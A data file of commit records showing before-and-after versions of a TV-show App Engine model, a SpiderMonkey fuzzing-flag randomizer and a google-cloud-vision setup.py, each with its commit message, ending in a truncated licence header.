show = Show.all().filter("tvrage_id =",show_info.tvrage_id).get()
if show is None:
logging.debug("Creating Show...")
show = Show(name=show_info.name,
network=show_info.network,
genres=show_info.genres,
active=show_info.active,
country=show_info.country,
runtime=show_info.runtime,
timezone=show_info.timezone,
tvrage_id=show_info.tvrage_id)
show.put()
show.update(show_info)
class Season(db.Model):
show = db.ReferenceProperty(Show)
number = db.IntegerProperty()
start = db.DateTimeProperty()
end = db.DateTimeProperty()
@classmethod
def kind(cls):
return "series_season"
@classmethod
def update_or_create(cls, show, season_info, get_everything=False):
season = Season.all().filter("show =", show).filter("number =",season_info.season_nr).get()
logging.debug("Found season? %s" % season)
if season is None:
season = Season(show=show, number=season_info.season_nr)
season.put()
season.update(season_info, get_everything=get_everything)
season.put()
def update(self, season_info, get_everything=False):
first_date = None
episode_info = None
now = utc.localize(datetime.datetime.now())
fortyeight_hours_ago = now - datetime.timedelta(hours=48)
for episode_info in season_info.episodes:
logging.debug("Update episode... %s" % episode_info)
if first_date is None:
first_date = episode_info.date
if get_everything or episode_info.date is None or episode_info.date >= fortyeight_hours_ago:
episode = Episode.update_or_create(self, episode_info)
logging.debug("All episodes updated...")
self.start = first_date
if episode_info is not None:
self.end = episode_info.date
class Episode(db.Model):
show = db.ReferenceProperty(Show)
season = db.ReferenceProperty(Season)
season_number = db.IntegerProperty()
number = db.IntegerProperty()
title = db.StringProperty()
text = db.TextProperty(default="")
date = db.DateTimeProperty()
_memkey_episode_dict = "all_episodes_dict"
@classmethod
def kind(cls):
return "series_episode"
@property
def date_end(self):
return self.date + datetime.timedelta(minutes=self.show.runtime)
@classmethod
def update_or_create(cls, season, episode_info):
episode = Episode.all().filter("show =",season.show).filter("season =",season)\
.filter("number =", episode_info.nr).get()
logging.debug("Found episode... %s" % episode)
if episode is None:
episode = Episode.create(season, episode_info)
else:
episode.update(episode_info)
episode.put()
return episode
@classmethod
def create(cls, season, episode_info):
return Episode(show=season.show, season=season,
season_number=season.number,
number=episode_info.nr,
title=episode_info.title,
date=episode_info.date)
@classmethod
def get_all_dict(cls):
episode_dict = memcache.get(cls._memkey_episode_dict)
if episode_dict is not None:
return episode_dict
now = datetime.datetime.now()
one_week_ago = now - datetime.timedelta(days=8)
# in_one_week = now + datetime.timedelta(days=8)
episodes = Episode.all().filter("date >",one_week_ago)
# removed this: .filter("date <",in_one_week).fetch(1000)
episode_dict = {}
for ep in episodes:
if len(episode_dict.get(str(ep._show),[])) < 20:
# store max of 20 episodes per show
episode_dict.setdefault(str(ep._show), []).append(ep)
memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
return episode_dict
@classmethod
def clear_cache(cls):
memcache.delete(cls._memkey_episode_dict)
@classmethod
def add_clear_cache_task(cls, queue_name):
t = taskqueue.Task(url=reverse('seriesly-shows-clear_cache'), params={})
t.add(queue_name=queue_name)
return t
@classmethod
def get_for_shows(cls, shows, before=None, after=None, order=None):
episode_list = []
episode_dict = Episode.get_all_dict()
changed = False
now = datetime.datetime.now()
for show in shows:
k = str(show.key())
if k in episode_dict:
episode_dict[k].sort(key=lambda x: x.date)
prev = None
for ep in episode_dict[k]:
if prev is not None:
prev.next = ep
ep.show = show
if not hasattr(ep, "releases"):
if ep.date < now:
ep.releases = list(ep.release_set)
else:
ep.releases = []
changed = True
prev = ep
episode_list.extend(episode_dict[k])
if changed:
memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
episode_list.sort(key=lambda x: x.date)
if after is not None or before is not None:
lower = None
upper = len(episode_list)
for ep, i in zip(episode_list, range(len(episode_list))):
if after is not None and lower is None and ep.date > after:
lower = i
if before is not None and ep.date > before:
upper = i
break
if lower > 0 or upper < len(episode_list):
episode_list = episode_list[lower:upper]
if order is not None and order.startswith("-"):
episode_list.reverse()
return episode_list
@classmethod
def get_for_shows_old(cls, shows, before=None, after=None, order=None):
def extra(q):
if before is not None:
q = q.filter("date <", before)
if after is not None:
q = q.filter("date >", after)
if order is not None:
q = q.order(order)
return q
if not len(shows):
return []
if len(shows) <= 28:
logging.debug("starting query")
query = Episode.all().filter("show IN", shows)
return extra(query).fetch(1000)
episodes = []
for i in range(len(shows) / 28 + 1):
q_shows = shows[i*28:(i+1)*28]
if not len(q_shows): continue
episodes.extend(extra(Episode.all().filter("show IN", q_shows)).fetch(1000))
if order is not None and order.startswith("-"):
return sorted(episodes, lambda x: x.date).reverse()
else:
return sorted(episodes, lambda x: x.date)
def update(self, episode_info):
self.title = episode_info.title
self.date = episode_info.date
def get_next(self):
return Episode.all().filter("date >", self.date).get()
def create_event_details(self, cal):
vevent = cal.add('vevent')
vevent.add('uid').value = "seriesly-episode-%s" % self.key()
vevent.add('dtstart').value = self.date
vevent.add('dtend').value = self.date + datetime.timedelta(minutes=self.show.runtime)
vevent.add('summary').value = "%s - %s (%dx%d)" % (self.show.name, self.title,
self.season_number, self.number)
vevent.add('location').value = self.show.network
return vevent
filter by active shows
import logging
import re
import datetime
from pytz import utc
from google.appengine.api.labs import taskqueue
from google.appengine.api import memcache
from google.appengine.ext import db
from django.core.urlresolvers import reverse
from helper.string_utils import normalize
from series.tvrage import TVRage
class Show(db.Model):
name = db.StringProperty()
normalized_name = db.StringProperty()
alt_names = db.StringProperty()
slug = db.StringProperty()
description = db.StringProperty(indexed=False)
genres = db.StringProperty(indexed=False)
network = db.StringProperty(indexed=False)
active = db.BooleanProperty()
country = db.StringProperty(indexed=False)
runtime = db.IntegerProperty()
timezone = db.StringProperty(indexed=False)
tvrage_id = db.IntegerProperty()
_memkey_all_shows_ordered = "all_shows_ordered"
_memkey_shows_dict = "all_shows_dict"
re_find_the = re.compile("^The (.*)$")
@classmethod
def kind(cls):
return "series_show"
def __unicode__(self):
return self.name
@property
def idnr(self):
return self.key().id()
def alternative_names(self):
if self.alt_names is None:
return []
return self.alt_names.split("|")
@classmethod
def get_all_ordered(cls):
shows = memcache.get(cls._memkey_all_shows_ordered)
if shows is not None:
return shows
shows = Show.all().filter("active =", True)
show_list = []
for show in shows:
if len(show.name) > 33:
show.ordered_name = cls.re_find_the.sub("\\1, The", show.name[:33]+"...")
else:
show.ordered_name = cls.re_find_the.sub("\\1, The", show.name)
show_list.append(show)
shows = sorted(show_list, key=lambda x: x.ordered_name)
memcache.set(key=cls._memkey_all_shows_ordered, value=shows)
return shows
@classmethod
def find(cls, show_name):
if not len(show_name):
return None
norm_name = normalize(show_name)
shows = Show.get_all_ordered()
for show in shows:
if show_name == show.name or norm_name == show.normalized_name or \
any([norm_name == alt_name for alt_name in show.alternative_names()]):
return show
@classmethod
def get_all_dict(cls):
show_dict = memcache.get(cls._memkey_shows_dict)
if show_dict is not None:
return show_dict
shows = Show.get_all_ordered()
show_dict = dict([(str(show.key()), show) for show in shows])
memcache.set(key=cls._memkey_shows_dict, value=show_dict)
return show_dict
@classmethod
def clear_cache(cls):
memcache.delete(cls._memkey_all_shows_ordered)
memcache.delete(cls._memkey_shows_dict)
def add_update_task(self):
t = taskqueue.Task(url=reverse('seriesly-shows-update_show'), params={"key": str(self.key())})
t.add(queue_name="series")
return t
def update(self, show_info=None, get_everything=False):
if show_info is None:
tvrage = TVRage()
show_info = tvrage.get_info(self.tvrage_id)
if show_info.name.startswith("'"): # Kill >>'Til Death<< here
show_info.name = show_info.name.replace("'","",1)
attr_list = ["name","network","genres","active","country","runtime","timezone","tvrage_id"]
if self.update_attrs(show_info,attr_list):
self.put()
for season_info in show_info.seasons:
logging.debug("Update or create Season...")
Season.update_or_create(self, season_info, get_everything=get_everything)
def update_attrs(self, info_obj, attr_list):
changed = False
for attr in attr_list:
val = getattr(info_obj, attr)
if val != getattr(self, attr):
setattr(self, attr, val)
changed = True
return changed
def put(self):
self.normalized_name = normalize(self.name)
return super(Show, self).put()
@classmethod
def update_or_create(cls, name, show_id=None):
tvrage = TVRage()
if name is not None:
show_info = tvrage.get_info_by_name(name)
else:
show_info = tvrage.get_info(show_id)
if show_info is None:
return False
logging.debug("Show exists..?")
show = Show.all().filter("tvrage_id =",show_info.tvrage_id).get()
if show is None:
logging.debug("Creating Show...")
show = Show(name=show_info.name,
network=show_info.network,
genres=show_info.genres,
active=show_info.active,
country=show_info.country,
runtime=show_info.runtime,
timezone=show_info.timezone,
tvrage_id=show_info.tvrage_id)
show.put()
show.update(show_info)
class Season(db.Model):
show = db.ReferenceProperty(Show)
number = db.IntegerProperty()
start = db.DateTimeProperty()
end = db.DateTimeProperty()
@classmethod
def kind(cls):
return "series_season"
@classmethod
def update_or_create(cls, show, season_info, get_everything=False):
season = Season.all().filter("show =", show).filter("number =",season_info.season_nr).get()
logging.debug("Found season? %s" % season)
if season is None:
season = Season(show=show, number=season_info.season_nr)
season.put()
season.update(season_info, get_everything=get_everything)
season.put()
def update(self, season_info, get_everything=False):
first_date = None
episode_info = None
now = utc.localize(datetime.datetime.now())
fortyeight_hours_ago = now - datetime.timedelta(hours=48)
for episode_info in season_info.episodes:
logging.debug("Update episode... %s" % episode_info)
if first_date is None:
first_date = episode_info.date
if get_everything or episode_info.date is None or episode_info.date >= fortyeight_hours_ago:
episode = Episode.update_or_create(self, episode_info)
logging.debug("All episodes updated...")
self.start = first_date
if episode_info is not None:
self.end = episode_info.date
class Episode(db.Model):
show = db.ReferenceProperty(Show)
season = db.ReferenceProperty(Season)
season_number = db.IntegerProperty()
number = db.IntegerProperty()
title = db.StringProperty()
text = db.TextProperty(default="")
date = db.DateTimeProperty()
_memkey_episode_dict = "all_episodes_dict"
@classmethod
def kind(cls):
return "series_episode"
@property
def date_end(self):
return self.date + datetime.timedelta(minutes=self.show.runtime)
@classmethod
def update_or_create(cls, season, episode_info):
episode = Episode.all().filter("show =",season.show).filter("season =",season)\
.filter("number =", episode_info.nr).get()
logging.debug("Found episode... %s" % episode)
if episode is None:
episode = Episode.create(season, episode_info)
else:
episode.update(episode_info)
episode.put()
return episode
@classmethod
def create(cls, season, episode_info):
return Episode(show=season.show, season=season,
season_number=season.number,
number=episode_info.nr,
title=episode_info.title,
date=episode_info.date)
@classmethod
def get_all_dict(cls):
episode_dict = memcache.get(cls._memkey_episode_dict)
if episode_dict is not None:
return episode_dict
now = datetime.datetime.now()
one_week_ago = now - datetime.timedelta(days=8)
# in_one_week = now + datetime.timedelta(days=8)
episodes = Episode.all().filter("date >",one_week_ago)
# removed this: .filter("date <",in_one_week).fetch(1000)
episode_dict = {}
for ep in episodes:
if len(episode_dict.get(str(ep._show),[])) < 20:
# store max of 20 episodes per show
episode_dict.setdefault(str(ep._show), []).append(ep)
memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
return episode_dict
@classmethod
def clear_cache(cls):
memcache.delete(cls._memkey_episode_dict)
@classmethod
def add_clear_cache_task(cls, queue_name):
t = taskqueue.Task(url=reverse('seriesly-shows-clear_cache'), params={})
t.add(queue_name=queue_name)
return t
@classmethod
def get_for_shows(cls, shows, before=None, after=None, order=None):
episode_list = []
episode_dict = Episode.get_all_dict()
changed = False
now = datetime.datetime.now()
for show in shows:
k = str(show.key())
if k in episode_dict:
episode_dict[k].sort(key=lambda x: x.date)
prev = None
for ep in episode_dict[k]:
if prev is not None:
prev.next = ep
ep.show = show
if not hasattr(ep, "releases"):
if ep.date < now:
ep.releases = list(ep.release_set)
else:
ep.releases = []
changed = True
prev = ep
episode_list.extend(episode_dict[k])
if changed:
memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
episode_list.sort(key=lambda x: x.date)
if after is not None or before is not None:
lower = None
upper = len(episode_list)
for ep, i in zip(episode_list, range(len(episode_list))):
if after is not None and lower is None and ep.date > after:
lower = i
if before is not None and ep.date > before:
upper = i
break
if lower > 0 or upper < len(episode_list):
episode_list = episode_list[lower:upper]
if order is not None and order.startswith("-"):
episode_list.reverse()
return episode_list
@classmethod
def get_for_shows_old(cls, shows, before=None, after=None, order=None):
def extra(q):
if before is not None:
q = q.filter("date <", before)
if after is not None:
q = q.filter("date >", after)
if order is not None:
q = q.order(order)
return q
if not len(shows):
return []
if len(shows) <= 28:
logging.debug("starting query")
query = Episode.all().filter("show IN", shows)
return extra(query).fetch(1000)
episodes = []
for i in range(len(shows) / 28 + 1):
q_shows = shows[i*28:(i+1)*28]
if not len(q_shows): continue
episodes.extend(extra(Episode.all().filter("show IN", q_shows)).fetch(1000))
if order is not None and order.startswith("-"):
return sorted(episodes, lambda x: x.date).reverse()
else:
return sorted(episodes, lambda x: x.date)
def update(self, episode_info):
self.title = episode_info.title
self.date = episode_info.date
def get_next(self):
return Episode.all().filter("date >", self.date).get()
def create_event_details(self, cal):
vevent = cal.add('vevent')
vevent.add('uid').value = "seriesly-episode-%s" % self.key()
vevent.add('dtstart').value = self.date
vevent.add('dtend').value = self.date + datetime.timedelta(minutes=self.show.runtime)
vevent.add('summary').value = "%s - %s (%dx%d)" % (self.show.name, self.title,
self.season_number, self.number)
vevent.add('location').value = self.show.network
return vevent |
import random
import os
import sys
from multiprocessing import cpu_count
from inspectShell import shellSupports
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
def memoize(f, cache={}):
'''Function decorator that caches function results.'''
# From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
def g(*args, **kwargs):
key = ( f, tuple(args), frozenset(kwargs.items()) )
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
@memoize
def shellSupportsFlag(shellPath, flag):
return shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
return random.random() < p
def randomFlagSet(shellPath):
'''
Returns a random list of command-line flags appropriate for the given shell.
Only works for spidermonkey js shell. Does not work for xpcshell.
'''
args = []
ion = shellSupportsFlag(shellPath, "--ion") and chance(.7)
infer = chance(.7)
if shellSupportsFlag(shellPath, '--fuzzing-safe'):
args.append("--fuzzing-safe") # --fuzzing-safe landed in bug 885361
if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
args.append("--no-fpu") # --no-fpu landed in bug 858022
# --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
if shellSupportsFlag(shellPath, '--baseline-eager'):
if chance(.3):
args.append('--no-baseline')
# elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
elif chance(.6):
args.append("--baseline-eager")
if cpu_count() > 1 and shellSupportsFlag(shellPath, '--ion-parallel-compile=on'):
# Turns on parallel compilation for threadsafe builds.
if chance(.7):
args.append("--ion-parallel-compile=on")
totalThreads = random.randint(2, (cpu_count() * 2))
args.append('--thread-count=' + str(totalThreads))
if not infer:
args.append("--no-ti")
if ion:
if chance(.6):
args.append("--ion-eager")
if chance(.2):
args.append("--ion-gvn=" + random.choice(["off", "pessimistic", "optimistic"]))
if chance(.2):
args.append("--ion-licm=off")
if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
args.append("--ion-edgecase-analysis=off")
if chance(.2):
args.append("--ion-range-analysis=off")
if chance(.2):
args.append("--ion-inlining=off")
if chance(.2):
args.append("--ion-osr=off")
if chance(.2):
args.append("--ion-limit-script-size=off")
# Landed in m-c changeset 8db8eef79b8c
if shellSupportsFlag(shellPath, '--ion-regalloc=lsra'):
if chance(.5):
args.append('--ion-regalloc=lsra') # On by default
# Backtracking and stupid landed in m-c changeset dc4887f61d2e
elif shellSupportsFlag(shellPath, '--ion-regalloc=backtracking') and chance(.4):
args.append('--ion-regalloc=backtracking')
# Disabled until bug 867767, bug 868731 and bug 871848 are fixed.
#elif shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
# args.append('--ion-regalloc=stupid')
if shellSupportsFlag(shellPath, '--ion-compile-try-catch'):
if chance(.5):
args.append('--ion-compile-try-catch')
if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
if chance(.5):
args.append('--ion-check-range-analysis')
else:
args.append("--no-ion")
# This is here because of bug 830508
# This will all be Falsed due to bug 875656, which breaks jsfunfuzz
if False and shellSupportsFlag(shellPath, "--execute=enableSPSProfilingAssertions(true)") and chance(.5):
if chance(.5):
args.append("--execute=enableSPSProfilingAssertions(true)")
else:
args.append("--execute=enableSPSProfilingAssertions(false)")
#if chance(.05):
# args.append("--execute=verifyprebarriers()")
#if chance(.05):
# args.append("--execute=verifypostbarriers()")
if chance(.05):
args.append("-D") # aka --dump-bytecode
return args
def basicFlagSets(shellPath):
'''
compareJIT uses these combinations of flags (as well as the original set of flags) when run
through Lithium and autoBisect.
'''
if shellSupportsFlag(shellPath, "--fuzzing-safe"):
basicFlagList = [
# Parts of this flag permutation come from:
# http://hg.mozilla.org/mozilla-central/annotate/c6bca8768874/js/src/jit-test/jit_test.py#l140
# as well as other interesting flag combinations that have found / may find new bugs.
['--fuzzing-safe'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--no-baseline'], # Not in jit_test.py though...
['--fuzzing-safe', '--no-baseline', '--no-ion', '--no-ti'],
['--fuzzing-safe', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-eager'],
['--fuzzing-safe', '--baseline-eager'],
['--fuzzing-safe', '--baseline-eager', '--no-ion'], # See bug 848906 comment 1
['--fuzzing-safe', '--baseline-eager', '--no-ti'], # Not in jit_test.py though...
['--fuzzing-safe', '--baseline-eager', '--no-ti', '--no-fpu'],
]
return basicFlagList
elif shellSupportsFlag(shellPath, "--baseline-eager"):
basicFlagList = [
# From http://hg.mozilla.org/mozilla-central/annotate/4236b1163508/js/src/jit-test/jit_test.py#l140
[], # Here, compareJIT uses no flags as the sole baseline when fuzzing
['--no-baseline'], # Not in jit_test.py as of rev c6bca8768874 though...
['--no-baseline', '--no-ion', '--no-ti'],
['--no-baseline', '--no-ion'],
['--no-baseline', '--ion-eager'], # Not in jit_test.py as of rev c6bca8768874 though...
['--ion-eager'],
['--baseline-eager'],
['--baseline-eager', '--no-ion'], # See bug 848906 comment 1
['--baseline-eager', '--no-ti'], # Not in jit_test.py as of rev c6bca8768874 though...
['--baseline-eager', '--no-ti', '--no-fpu'],
]
return basicFlagList
elif shellSupportsFlag(shellPath, "--no-ion"):
basicFlagList = [
# From https://bugzilla.mozilla.org/attachment.cgi?id=616725
[], # Here, compareJIT uses no flags as the sole baseline when fuzzing
['--no-jm'],
['--ion-gvn=off', '--ion-licm=off'],
['--no-ion', '--no-jm', '--no-ti'],
['--no-ion', '--no-ti'],
['--no-ion', '--no-ti', '-a', '-d'],
['--no-ion', '--no-jm'],
['--no-ion'],
['--no-ion', '-a'],
['--no-ion', '-a', '-d'],
['--no-ion', '-d'],
# Plus a special bonus
['--ion-eager'],
]
if shellSupportsFlag(shellPath, "--no-baseline"):
basicFlagList.extend([
['--no-baseline'],
['--no-baseline', '--no-ti'],
])
return basicFlagList
else:
sets = [
# ,m,am,amd,n,mn,amn,amdn,mdn
[],
['-m'],
['-m', '-a'],
['-m', '-a', '-d']
]
if shellSupportsFlag(shellPath, '-n'):
sets.extend([
['-n'],
['-m', '-n'],
['-m', '-n', '-a'],
['-m', '-n', '-a', '-d'],
['-m', '-n', '-d']
])
if shellSupportsFlag(shellPath, "--ion"):
sets += [["--ion"] + set for set in sets]
return sets
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
import sys
for i in range(100):
print ' '.join(randomFlagSet(sys.argv[1]))
if __name__ == "__main__":
testRandomFlags()
Add suppression for bug 906885.
import random
import os
import sys
from multiprocessing import cpu_count
from inspectShell import shellSupports
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
def memoize(f, cache={}):
'''Function decorator that caches function results.'''
# From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
def g(*args, **kwargs):
key = ( f, tuple(args), frozenset(kwargs.items()) )
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
@memoize
def shellSupportsFlag(shellPath, flag):
return shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
return random.random() < p
def randomFlagSet(shellPath):
'''
Returns a random list of command-line flags appropriate for the given shell.
Only works for spidermonkey js shell. Does not work for xpcshell.
'''
args = []
ion = shellSupportsFlag(shellPath, "--ion") and chance(.7)
infer = chance(.7)
if shellSupportsFlag(shellPath, '--fuzzing-safe'):
args.append("--fuzzing-safe") # --fuzzing-safe landed in bug 885361
if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
args.append("--no-fpu") # --no-fpu landed in bug 858022
# --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
if shellSupportsFlag(shellPath, '--baseline-eager'):
if chance(.3):
args.append('--no-baseline')
# elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
elif chance(.6):
args.append("--baseline-eager")
if cpu_count() > 1 and shellSupportsFlag(shellPath, '--ion-parallel-compile=on'):
# Turns on parallel compilation for threadsafe builds.
if chance(.7):
args.append("--ion-parallel-compile=on")
totalThreads = random.randint(2, (cpu_count() * 2))
args.append('--thread-count=' + str(totalThreads))
if not infer:
args.append("--no-ti")
if ion:
if chance(.6):
args.append("--ion-eager")
if chance(.2):
args.append("--ion-gvn=" + random.choice(["off", "pessimistic", "optimistic"]))
if chance(.2):
args.append("--ion-licm=off")
if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
args.append("--ion-edgecase-analysis=off")
if chance(.2):
args.append("--ion-range-analysis=off")
if chance(.2):
args.append("--ion-inlining=off")
if chance(.2):
args.append("--ion-osr=off")
if chance(.2):
args.append("--ion-limit-script-size=off")
# Landed in m-c changeset 8db8eef79b8c
if shellSupportsFlag(shellPath, '--ion-regalloc=lsra'):
if chance(.5):
args.append('--ion-regalloc=lsra') # On by default
# Backtracking and stupid landed in m-c changeset dc4887f61d2e
elif shellSupportsFlag(shellPath, '--ion-regalloc=backtracking') and chance(.4):
args.append('--ion-regalloc=backtracking')
# Disabled until bug 867767, bug 868731 and bug 871848 are fixed.
#elif shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
# args.append('--ion-regalloc=stupid')
if shellSupportsFlag(shellPath, '--ion-compile-try-catch'):
if chance(.5):
args.append('--ion-compile-try-catch')
# Commented out due to bug 906885.
#if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
# if chance(.5):
# args.append('--ion-check-range-analysis')
else:
args.append("--no-ion")
# This is here because of bug 830508
# This will all be Falsed due to bug 875656, which breaks jsfunfuzz
if False and shellSupportsFlag(shellPath, "--execute=enableSPSProfilingAssertions(true)") and chance(.5):
if chance(.5):
args.append("--execute=enableSPSProfilingAssertions(true)")
else:
args.append("--execute=enableSPSProfilingAssertions(false)")
#if chance(.05):
# args.append("--execute=verifyprebarriers()")
#if chance(.05):
# args.append("--execute=verifypostbarriers()")
if chance(.05):
args.append("-D") # aka --dump-bytecode
return args
def basicFlagSets(shellPath):
'''
compareJIT uses these combinations of flags (as well as the original set of flags) when run
through Lithium and autoBisect.
'''
if shellSupportsFlag(shellPath, "--fuzzing-safe"):
basicFlagList = [
# Parts of this flag permutation come from:
# http://hg.mozilla.org/mozilla-central/annotate/c6bca8768874/js/src/jit-test/jit_test.py#l140
# as well as other interesting flag combinations that have found / may find new bugs.
['--fuzzing-safe'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--no-baseline'], # Not in jit_test.py though...
['--fuzzing-safe', '--no-baseline', '--no-ion', '--no-ti'],
['--fuzzing-safe', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-eager'],
['--fuzzing-safe', '--baseline-eager'],
['--fuzzing-safe', '--baseline-eager', '--no-ion'], # See bug 848906 comment 1
['--fuzzing-safe', '--baseline-eager', '--no-ti'], # Not in jit_test.py though...
['--fuzzing-safe', '--baseline-eager', '--no-ti', '--no-fpu'],
]
return basicFlagList
elif shellSupportsFlag(shellPath, "--baseline-eager"):
basicFlagList = [
# From http://hg.mozilla.org/mozilla-central/annotate/4236b1163508/js/src/jit-test/jit_test.py#l140
[], # Here, compareJIT uses no flags as the sole baseline when fuzzing
['--no-baseline'], # Not in jit_test.py as of rev c6bca8768874 though...
['--no-baseline', '--no-ion', '--no-ti'],
['--no-baseline', '--no-ion'],
['--no-baseline', '--ion-eager'], # Not in jit_test.py as of rev c6bca8768874 though...
['--ion-eager'],
['--baseline-eager'],
['--baseline-eager', '--no-ion'], # See bug 848906 comment 1
['--baseline-eager', '--no-ti'], # Not in jit_test.py as of rev c6bca8768874 though...
['--baseline-eager', '--no-ti', '--no-fpu'],
]
return basicFlagList
elif shellSupportsFlag(shellPath, "--no-ion"):
basicFlagList = [
# From https://bugzilla.mozilla.org/attachment.cgi?id=616725
[], # Here, compareJIT uses no flags as the sole baseline when fuzzing
['--no-jm'],
['--ion-gvn=off', '--ion-licm=off'],
['--no-ion', '--no-jm', '--no-ti'],
['--no-ion', '--no-ti'],
['--no-ion', '--no-ti', '-a', '-d'],
['--no-ion', '--no-jm'],
['--no-ion'],
['--no-ion', '-a'],
['--no-ion', '-a', '-d'],
['--no-ion', '-d'],
# Plus a special bonus
['--ion-eager'],
]
if shellSupportsFlag(shellPath, "--no-baseline"):
basicFlagList.extend([
['--no-baseline'],
['--no-baseline', '--no-ti'],
])
return basicFlagList
else:
sets = [
# ,m,am,amd,n,mn,amn,amdn,mdn
[],
['-m'],
['-m', '-a'],
['-m', '-a', '-d']
]
if shellSupportsFlag(shellPath, '-n'):
sets.extend([
['-n'],
['-m', '-n'],
['-m', '-n', '-a'],
['-m', '-n', '-a', '-d'],
['-m', '-n', '-d']
])
if shellSupportsFlag(shellPath, "--ion"):
sets += [["--ion"] + set for set in sets]
return sets
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
import sys
for i in range(100):
print ' '.join(randomFlagSet(sys.argv[1]))
if __name__ == "__main__":
testRandomFlags()
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import os
from setuptools import find_packages
from setuptools import setup
PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))
with io.open(os.path.join(PACKAGE_ROOT, 'README.rst'), 'r') as readme_file:
readme = readme_file.read()
REQUIREMENTS = [
'google-cloud-core >= 0.24.0, < 0.25dev',
]
EXTRAS_REQUIRE = {
':python_version<"3.4"': ['enum34'],
}
setup(
author='Google Cloud Platform',
author_email='googleapis-packages@google.com',
name='google-cloud-vision',
version='0.25.0',
description='Python Client for Google Cloud Vision',
long_description=readme,
namespace_packages=[
'google',
'google.cloud',
'google.cloud.gapic',
'google.cloud.gapic.vision',
'google.cloud.proto',
'google.cloud.proto.vision',
],
packages=find_packages(exclude=('tests*',)),
install_requires=REQUIREMENTS,
extras_require=EXTRAS_REQUIRE,
url='https://github.com/GoogleCloudPlatform/google-cloud-python',
license='Apache 2.0',
platforms='Posix; MacOS X; Windows',
include_package_data=True,
zip_safe=False,
scripts=[],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet',
],
)
Fix deps (#3480)
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import os
from setuptools import find_packages
from setuptools import setup
PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__))
with io.open(os.path.join(PACKAGE_ROOT, 'README.rst'), 'r') as readme_file:
readme = readme_file.read()
REQUIREMENTS = [
'google-cloud-core >= 0.24.0, < 0.25dev',
'google-gax >= 0.15.7, < 0.16dev',
'googleapis-common-protos[grpc] >= 1.5.2, < 2.0dev',
]
EXTRAS_REQUIRE = {
':python_version<"3.4"': ['enum34'],
}
setup(
author='Google Cloud Platform',
author_email='googleapis-packages@google.com',
name='google-cloud-vision',
version='0.25.0',
description='Python Client for Google Cloud Vision',
long_description=readme,
namespace_packages=[
'google',
'google.cloud',
'google.cloud.gapic',
'google.cloud.gapic.vision',
'google.cloud.proto',
'google.cloud.proto.vision',
],
packages=find_packages(exclude=('tests*',)),
install_requires=REQUIREMENTS,
extras_require=EXTRAS_REQUIRE,
url='https://github.com/GoogleCloudPlatform/google-cloud-python',
license='Apache 2.0',
platforms='Posix; MacOS X; Windows',
include_package_data=True,
zip_safe=False,
scripts=[],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet',
],
)
|
"""
Copyright 2012 Numan Sachwani <numan@7Geese.com>
This file is provided to you under the Apache License,
